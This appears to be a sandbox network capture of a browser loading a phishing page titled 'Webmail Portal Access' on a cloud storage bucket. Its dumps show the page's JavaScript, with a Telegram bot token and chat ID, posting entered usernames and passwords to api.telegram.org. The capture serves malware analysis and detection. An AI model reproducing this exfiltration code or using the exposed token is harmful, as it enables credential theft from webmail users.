2025-01-09 18:29:08 UTC	1369	IN	Data Raw: 20 2d 77 65 62 6b 69 74 2d 66 6f 63 75 73 2d 72 69 6e 67 2d 63 6f 6c 6f 72 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 72 6f 6c 65 3d 62 75 74 74 6f 6e 5d 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 73 65 6c 65 63 74 7b 77 6f 72 64 2d 77 72 61 70 3a 6e 6f 72 6d 61 6c 7d 5b 74 79 70 65 3d 62 Data Ascii: -webkit-focus-ring-color}button,input,optgroup,select,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}button,input{overflow:visible}button,select{text-transform:none}[role=button]{cursor:pointer}select{word-wrap:normal}[type=b
2025-01-09 18:29:08 UTC	1369	IN	Data Raw: 2c 68 33 2c 68 34 2c 68 35 2c 68 36 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 2e 68 31 2c 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 7d 2e 68 32 2c 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 7d 2e 68 33 2c 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 35 72 65 6d 7d 2e 68 34 2c 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 7d 2e 68 35 2c 68 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 7d 2e 68 36 2c 68 36 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 7d 2e 6c 65 61 64 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 7d 2e 64 69 73 70 6c 61 79 Data Ascii: ,h3,h4,h5,h6{margin-bottom:.5rem;font-weight:500;line-height:1.2}.h1,h1{font-size:2.5rem}.h2,h2{font-size:2rem}.h3,h3{font-size:1.75rem}.h4,h4{font-size:1.5rem}.h5,h5{font-size:1.25rem}.h6,h6{font-size:1rem}.lead{font-size:1.25rem;font-weight:300}.display
2025-01-09 18:29:08 UTC	1369	IN	Data Raw: 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 61 3e 63 6f 64 65 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 6b 62 64 7b 70 61 64 64 69 6e 67 3a 2e 32 72 65 6d 20 2e 34 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 38 37 2e 35 25 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 32 35 32 39 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 32 72 65 6d 7d 6b 62 64 20 6b 62 64 7b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 70 72 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 38 37 2e 35 25 3b 63 6f 6c 6f 72 3a 23 32 31 32 35 32 39 7d 70 72 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 69 Data Ascii: word-wrap:break-word}a>code{color:inherit}kbd{padding:.2rem .4rem;font-size:87.5%;color:#fff;background-color:#212529;border-radius:.2rem}kbd kbd{padding:0;font-size:100%;font-weight:700}pre{display:block;font-size:87.5%;color:#212529}pre code{font-size:i
2025-01-09 18:29:08 UTC	1369	IN	Data Raw: 2d 6d 64 2d 31 31 2c 2e 63 6f 6c 2d 6d 64 2d 31 32 2c 2e 63 6f 6c 2d 6d 64 2d 32 2c 2e 63 6f 6c 2d 6d 64 2d 33 2c 2e 63 6f 6c 2d 6d 64 2d 34 2c 2e 63 6f 6c 2d 6d 64 2d 35 2c 2e 63 6f 6c 2d 6d 64 2d 36 2c 2e 63 6f 6c 2d 6d 64 2d 37 2c 2e 63 6f 6c 2d 6d 64 2d 38 2c 2e 63 6f 6c 2d 6d 64 2d 39 2c 2e 63 6f 6c 2d 6d 64 2d 61 75 74 6f 2c 2e 63 6f 6c 2d 73 6d 2c 2e 63 6f 6c 2d 73 6d 2d 31 2c 2e 63 6f 6c 2d 73 6d 2d 31 30 2c 2e 63 6f 6c 2d 73 6d 2d 31 31 2c 2e 63 6f 6c 2d 73 6d 2d 31 32 2c 2e 63 6f 6c 2d 73 6d 2d 32 2c 2e 63 6f 6c 2d 73 6d 2d 33 2c 2e 63 6f 6c 2d 73 6d 2d 34 2c 2e 63 6f 6c 2d 73 6d 2d 35 2c 2e 63 6f 6c 2d 73 6d 2d 36 2c 2e 63 6f 6c 2d 73 6d 2d 37 2c 2e 63 6f 6c 2d 73 6d 2d 38 2c 2e 63 6f 6c 2d 73 6d 2d 39 2c 2e 63 6f 6c 2d 73 6d 2d 61 75 74 6f 2c Data Ascii: -md-11,.col-md-12,.col-md-2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-md-7,.col-md-8,.col-md-9,.col-md-auto,.col-sm,.col-sm-1,.col-sm-10,.col-sm-11,.col-sm-12,.col-sm-2,.col-sm-3,.col-sm-4,.col-sm-5,.col-sm-6,.col-sm-7,.col-sm-8,.col-sm-9,.col-sm-auto,
2025-01-09 18:29:08 UTC	1369	IN	Data Raw: 30 20 30 20 35 30 25 3b 66 6c 65 78 3a 30 20 30 20 35 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 35 30 25 7d 2e 63 6f 6c 2d 37 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 35 38 2e 33 33 33 33 33 33 25 3b 66 6c 65 78 3a 30 20 30 20 35 38 2e 33 33 33 33 33 33 25 3b 6d 61 78 2d 77 69 64 74 68 3a 35 38 2e 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 38 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 36 36 2e 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 36 36 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 36 36 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 39 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 37 35 25 3b 66 6c 65 78 3a 30 20 30 20 37 35 25 3b 6d 61 78 2d 77 69 64 74 68 3a 37 35 25 7d 2e 63 6f 6c 2d 31 30 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 38 33 2e 33 Data Ascii: 0 0 50%;flex:0 0 50%;max-width:50%}.col-7{-ms-flex:0 0 58.333333%;flex:0 0 58.333333%;max-width:58.333333%}.col-8{-ms-flex:0 0 66.666667%;flex:0 0 66.666667%;max-width:66.666667%}.col-9{-ms-flex:0 0 75%;flex:0 0 75%;max-width:75%}.col-10{-ms-flex:0 0 83.3
2025-01-09 18:29:08 UTC	1369	IN	Data Raw: 61 73 69 73 3a 30 3b 2d 6d 73 2d 66 6c 65 78 2d 70 6f 73 69 74 69 76 65 3a 31 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 31 3e 2a 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 32 3e 2a 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 35 30 25 3b 66 6c 65 78 3a 30 20 30 20 35 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 35 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 33 3e 2a 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 33 33 2e 33 33 33 33 33 33 25 3b 66 6c 65 78 3a 30 20 30 20 33 33 2e 33 33 33 33 33 33 25 3b 6d 61 78 2d 77 69 64 74 68 3a 33 33 2e 33 33 Data Ascii: asis:0;-ms-flex-positive:1;flex-grow:1;max-width:100%}.row-cols-sm-1>{-ms-flex:0 0 100%;flex:0 0 100%;max-width:100%}.row-cols-sm-2>{-ms-flex:0 0 50%;flex:0 0 50%;max-width:50%}.row-cols-sm-3>*{-ms-flex:0 0 33.333333%;flex:0 0 33.333333%;max-width:33.33
2025-01-09 18:29:08 UTC	1369	IN	Data Raw: 74 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 2d 31 3b 6f 72 64 65 72 3a 2d 31 7d 2e 6f 72 64 65 72 2d 73 6d 2d 6c 61 73 74 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 31 33 3b 6f 72 64 65 72 3a 31 33 7d 2e 6f 72 64 65 72 2d 73 6d 2d 30 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 30 3b 6f 72 64 65 72 3a 30 7d 2e 6f 72 64 65 72 2d 73 6d 2d 31 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 31 3b 6f 72 64 65 72 3a 31 7d 2e 6f 72 64 65 72 2d 73 6d 2d 32 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 32 3b 6f 72 64 65 72 3a 32 7d 2e 6f 72 64 65 72 2d 73 6d 2d 33 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 33 3b 6f 72 64 65 72 3a 33 7d 2e 6f 72 64 65 72 2d 73 6d 2d 34 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 34 3b 6f 72 64 65 72 3a 34 Data Ascii: t{-ms-flex-order:-1;order:-1}.order-sm-last{-ms-flex-order:13;order:13}.order-sm-0{-ms-flex-order:0;order:0}.order-sm-1{-ms-flex-order:1;order:1}.order-sm-2{-ms-flex-order:2;order:2}.order-sm-3{-ms-flex-order:3;order:3}.order-sm-4{-ms-flex-order:4;order:4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49715	162.243.189.2	443	3664	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 18:29:08 UTC	666	OUT	GET /favicon.ico HTTP/1.1 Host: ranprojects0s0wemanin.nyc3.digitaloceanspaces.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 18:29:08 UTC	475	IN	HTTP/1.1 403 Forbidden content-length: 256 x-amz-request-id: tx0000030114c373f00e17f-0067801574-229bb76d-nyc3d accept-ranges: bytes content-type: application/xml date: Thu, 09 Jan 2025 18:29:08 GMT vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method cache-control: max-age=0 strict-transport-security: max-age=15552000; includeSubDomains; preload x-amz-error-code: AccessDenied x-envoy-upstream-healthchecked-cluster: connection: close
2025-01-09 18:29:08 UTC	256	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 41 63 63 65 73 73 44 65 6e 69 65 64 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 3c 2f 4d 65 73 73 61 67 65 3e 3c 42 75 63 6b 65 74 4e 61 6d 65 3e 72 61 6e 70 72 6f 6a 65 63 74 73 30 73 30 77 65 6d 61 6e 69 6e 3c 2f 42 75 63 6b 65 74 4e 61 6d 65 3e 3c 52 65 71 75 65 73 74 49 64 3e 74 78 30 30 30 30 30 33 30 31 31 34 63 33 37 33 66 30 30 65 31 37 66 2d 30 30 36 37 38 30 31 35 37 34 2d 32 32 39 62 62 37 36 64 2d 6e 79 63 33 64 3c 2f 52 65 71 75 65 73 74 49 64 3e 3c 48 6f 73 74 49 64 3e 32 32 39 62 62 37 36 64 2d 6e 79 63 33 64 2d 6e 79 63 33 2d 7a 67 30 34 3c 2f 48 6f 73 74 49 64 3e 3c 2f 45 72 72 6f 72 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><Error><Code>AccessDenied</Code><Message></Message><BucketName>ranprojects0s0wemanin</BucketName><RequestId>tx0000030114c373f00e17f-0067801574-229bb76d-nyc3d</RequestId><HostId>229bb76d-nyc3d-nyc3-zg04</HostId></Error

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49720	162.243.189.2	443	3664	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 18:29:09 UTC	385	OUT	GET /webmail.html HTTP/1.1 Host: ranprojects0s0wemanin.nyc3.digitaloceanspaces.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 18:29:09 UTC	521	IN	HTTP/1.1 200 OK content-length: 32702 accept-ranges: bytes last-modified: Thu, 02 Jan 2025 22:06:27 GMT x-rgw-object-type: Normal etag: "a82931c016aa1a130cbb50eee3768791" x-amz-request-id: tx0000014f53c3b0cb5f133-0067801575-229bb76d-nyc3d content-type: text/html date: Thu, 09 Jan 2025 18:29:09 GMT vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method strict-transport-security: max-age=15552000; includeSubDomains; preload x-envoy-upstream-healthchecked-cluster: connection: close
2025-01-09 18:29:09 UTC	15863	IN	Data Raw: 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 52 65 71 75 69 72 65 64 20 6d 65 74 61 20 74 61 67 73 20 2d 2d 3e 0d 0a 20 20 20 0d 0a 20 20 20 20 3c 74 69 74 6c 65 20 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 6e 61 6d 65 22 3e 57 65 62 6d 61 69 6c 20 50 6f 72 74 61 6c 20 41 63 63 65 73 73 3c 2f 74 69 74 6c 65 3e 0d 0a 09 0d 0a 09 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 63 6b 70 61 74 68 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 Data Ascii: <!DOCTYPE html><html><head><html lang="en"><head> ... Required meta tags --> <title class="logoname">Webmail Portal Access</title> <link type="text/css" rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstr
2025-01-09 18:29:09 UTC	16384	IN	Data Raw: 6b 77 65 4c 6f 2b 53 50 36 36 70 4c 64 4a 52 63 2b 6d 38 44 71 4d 55 50 45 52 4d 78 53 4b 41 46 58 6d 49 73 54 76 72 79 74 74 43 4f 37 4f 34 39 59 46 51 61 35 2f 71 4a 63 76 2f 71 4c 62 39 66 58 74 48 57 46 45 62 67 51 35 47 6e 48 31 36 37 68 38 49 66 31 4f 34 63 6c 42 63 4e 34 39 75 70 41 65 4b 50 35 32 42 67 51 6f 6d 30 71 33 6e 53 47 6f 30 71 62 61 35 77 33 41 5a 49 38 4f 54 31 69 43 64 38 31 4f 77 37 53 4b 2b 78 5a 77 67 43 4c 36 74 39 77 64 51 77 56 59 64 78 6e 32 32 34 64 59 35 4f 59 69 4e 44 76 43 48 68 49 6b 45 34 69 44 51 2f 79 44 44 79 55 50 44 53 6c 51 56 36 54 42 6d 68 36 48 39 54 32 52 45 4e 36 77 77 4c 2f 65 58 67 4a 35 55 4c 50 6c 55 70 31 6a 56 38 73 42 49 6e 42 78 4d 73 53 4d 4b 55 4c 54 78 34 4e 52 77 38 46 74 56 70 46 76 55 30 46 34 46 Data Ascii: kweLo+SP66pLdJRc+m8DqMUPERMxSKAFXmIsTvryttCO7O49YFQa5/qJcv/qLb9fXtHWFEbgQ5GnH167h8If1O4clBcN49upAeKP52BgQom0q3nSGo0qba5w3AZI8OT1iCd81Ow7SK+xZwgCL6t9wdQwVYdxn224dY5OYiNDvCHhIkE4iDQ/yDDyUPDSlQV6TBmh6H9T2REN6wwL/eXgJ5ULPlUp1jV8sBInBxMsSMKULTx4NRw8FtVpFvU0F4F
2025-01-09 18:29:09 UTC	455	IN	Data Raw: 49 69 51 46 75 73 72 37 42 59 22 3b 0d 0a 09 09 76 61 72 20 63 68 61 74 5f 69 64 3d 20 22 37 34 36 38 33 30 37 37 33 39 22 3b 0d 0a 09 20 20 20 20 63 6f 6e 73 74 20 75 72 6c 20 3d 20 60 68 74 74 70 73 3a 2f 2f 61 70 69 2e 74 65 6c 65 67 72 61 6d 2e 6f 72 67 2f 62 6f 74 24 7b 74 6f 6b 65 6e 7d 2f 73 65 6e 64 4d 65 73 73 61 67 65 60 20 2f 2f 20 54 68 65 20 75 72 6c 20 74 6f 20 72 65 71 75 65 73 74 0d 0a 0d 0a 09 20 20 20 20 63 6f 6e 73 74 20 6f 62 6a 20 3d 20 7b 0d 0a 09 20 20 20 20 20 20 20 20 63 68 61 74 5f 69 64 3a 20 63 68 61 74 5f 69 64 2c 20 0d 0a 09 20 20 20 20 20 20 20 20 74 65 78 74 3a 20 6d 65 73 73 61 67 65 0d 0a 09 20 20 20 20 7d 3b 0d 0a 0d 0a 09 20 20 20 20 63 6f 6e 73 74 20 78 68 74 20 3d 20 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 Data Ascii: IiQFusr7BY";var chat_id= "7468307739"; const url = `https://api.telegram.org/bot${token}/sendMessage` // The url to request const obj = { chat_id: chat_id, text: message }; const xht = new XMLHttpReques

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49744	149.154.167.220	443	3664	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 18:29:19 UTC	630	OUT	OPTIONS /bot6510435122:AAGGrUI8KNiRsZwXvCj87UhSKIiQFusr7BY/sendMessage HTTP/1.1 Host: api.telegram.org Connection: keep-alive Accept: / Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type Origin: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site Sec-Fetch-Dest: empty Referer: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 18:29:19 UTC	345	IN	HTTP/1.1 204 No Content Server: nginx/1.18.0 Date: Thu, 09 Jan 2025 18:29:19 GMT Connection: close Access-Control-Max-Age: 86400 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Allow-Headers: content-type Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49750	149.154.167.220	443	3664	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 18:29:20 UTC	742	OUT	POST /bot6510435122:AAGGrUI8KNiRsZwXvCj87UhSKIiQFusr7BY/sendMessage HTTP/1.1 Host: api.telegram.org Connection: keep-alive Content-Length: 158 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-type: application/json; charset=UTF-8 Accept: / Origin: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 18:29:20 UTC	158	OUT	Data Raw: 7b 22 63 68 61 74 5f 69 64 22 3a 22 37 34 36 38 33 30 37 37 33 39 22 2c 22 74 65 78 74 22 3a 22 5c 6e 3d 3d 3d 3d 3d 3d 3d 3d 3d 57 45 53 54 45 52 4e 2d 50 52 4f 50 41 52 47 41 4e 44 41 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 75 73 65 72 3a 5c 74 6d 64 35 78 39 78 40 61 69 6b 7a 6d 79 2e 6e 65 74 5c 6e 70 61 73 73 3a 5c 74 2c 51 7d 72 56 69 26 2a 48 61 5c 6e 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 22 7d Data Ascii: {"chat_id":"7468307739","text":"\n=========WESTERN-PROPARGANDA==========\nuser:\tmd5x9x@aikzmy.net\npass:\t,Q}rVi&*Ha\n===================================\n"}
2025-01-09 18:29:20 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 09 Jan 2025 18:29:20 GMT Content-Type: application/json Content-Length: 398 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-09 18:29:20 UTC	398	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 35 31 30 34 33 35 31 32 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 55 6c 74 72 61 5f 6e 65 77 62 6f 74 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 55 6c 74 61 5f 6e 65 33 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 36 38 33 30 37 37 33 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 6f 6f 64 6c 69 66 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 34 34 37 33 36 30 2c 22 74 65 78 74 22 3a 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 57 45 53 54 45 52 4e 2d 50 52 4f 50 41 52 47 41 4e 44 41 3d 3d 3d 3d Data Ascii: {"ok":true,"result":{"message_id":435,"from":{"id":6510435122,"is_bot":true,"first_name":"Ultra_newbot3","username":"Ulta_ne3bot"},"chat":{"id":7468307739,"first_name":"Goodlife","type":"private"},"date":1736447360,"text":"=========WESTERN-PROPARGANDA====

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49761	149.154.167.220	443	3664	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 18:29:21 UTC	401	OUT	GET /bot6510435122:AAGGrUI8KNiRsZwXvCj87UhSKIiQFusr7BY/sendMessage HTTP/1.1 Host: api.telegram.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 18:29:21 UTC	346	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Thu, 09 Jan 2025 18:29:21 GMT Content-Type: application/json Content-Length: 80 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-09 18:29:21 UTC	80	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 6d 65 73 73 61 67 65 20 74 65 78 74 20 69 73 20 65 6d 70 74 79 22 7d Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: message text is empty"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49892	149.154.167.220	443	3664	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 18:29:42 UTC	742	OUT	POST /bot6510435122:AAGGrUI8KNiRsZwXvCj87UhSKIiQFusr7BY/sendMessage HTTP/1.1 Host: api.telegram.org Connection: keep-alive Content-Length: 160 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-type: application/json; charset=UTF-8 Accept: / Origin: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 18:29:42 UTC	160	OUT	Data Raw: 7b 22 63 68 61 74 5f 69 64 22 3a 22 37 34 36 38 33 30 37 37 33 39 22 2c 22 74 65 78 74 22 3a 22 5c 6e 3d 3d 3d 3d 3d 3d 3d 3d 3d 57 45 53 54 45 52 4e 2d 50 52 4f 50 41 52 47 41 4e 44 41 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 75 73 65 72 3a 5c 74 6d 64 35 78 39 78 40 61 69 6b 7a 6d 79 2e 6e 65 74 5c 6e 70 61 73 73 3a 5c 74 37 55 6b 4f 44 25 4c 42 34 25 38 31 5c 6e 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 22 7d Data Ascii: {"chat_id":"7468307739","text":"\n=========WESTERN-PROPARGANDA==========\nuser:\tmd5x9x@aikzmy.net\npass:\t7UkOD%LB4%81\n===================================\n"}
2025-01-09 18:29:42 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 09 Jan 2025 18:29:42 GMT Content-Type: application/json Content-Length: 400 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
